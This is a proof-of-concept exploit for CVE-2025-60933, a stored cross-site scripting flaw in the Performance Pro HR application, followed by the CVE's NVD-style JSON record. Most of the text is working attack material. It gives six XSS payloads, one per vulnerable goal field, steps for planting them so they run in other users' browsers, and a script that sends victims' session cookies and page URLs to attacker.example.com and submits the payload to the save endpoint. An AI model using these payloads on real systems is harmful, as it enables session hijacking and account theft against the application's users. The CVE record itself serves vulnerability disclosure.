CVE-2025-60933

<!-- CVE-2025-60933 PoC - Stored XSS in HR Performance Solutions Performance Pro v3.19.17 Vulnerable Parameters: Goal Name, Goal Notes, Action Step Name, Action Step Description, Note Name, Goal Description --> <!-- Step 1: Inject malicious payload into Goal Name parameter --> <script>alert('XSS-GoalName-CVE-2025-60933');</script> <!-- Step 2: Inject malicious payload into Goal Notes parameter --> <img src=x onerror="alert(document.cookie)"> <!-- Step 3: Inject malicious payload into Action Step Name parameter --> <svg/onload=alert('XSS-ActionStep')> <!-- Step 4: Inject malicious payload into Action Step Description parameter --> <body onload="fetch('https://attacker.example.com/steal?c='+document.cookie)"> <!-- Step 5: Inject malicious payload into Note Name parameter --> <input onfocus=alert('XSS-NoteName') autofocus> <!-- Step 6: Inject malicious payload into Goal Description parameter --> <iframe src="javascript:alert('XSS-GoalDescription')"></iframe> <!-- Usage: 1. Login to Performance Pro v3.19.17 with valid credentials 2. Navigate to Future Goals function 3. Create a new goal and paste one of the above payloads into the corresponding field 4. Save the goal 5. When any other user views the goal, the malicious script executes in their browser --> // JavaScript-based cookie stealing payload example var payload = '<script>\n' + 'var img = new Image();\n' + 'img.src = "https://attacker.example.com/steal?session=" + document.cookie + "&url=" + window.location.href;\n' + '</script>'; // Submit via fetch API to the Future Goals endpoint fetch('/future-goals/save', { method: 'POST', headers: {'Content-Type': 'application/x-www-form-urlencoded'}, body: 'goalName=' + encodeURIComponent(payload) + '&goalNotes=test&actionStepName=test&actionStepDescription=test&noteName=test&goalDescription=test' });

{"cve": {"id": "CVE-2025-60933", "sourceIdentifier": "[email protected]", "published": "2025-10-21T15:15:39.447", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multiple stored cross-site scripting (XSS) vulnerabilities in the Future Goals function of HR Performance Solutions Performance Pro v3.19.17 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Goal Name, Goal Notes, Action Step Name, Action Step Description, Note Name, and Goal Description parameters. The patched version is PP-Release-6.3.2.0."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://docs.offsecguy.com/cve/hr-performance-solutions/vulnerability/reflected-xss-future-goals", "source": "[email protected]"}]}}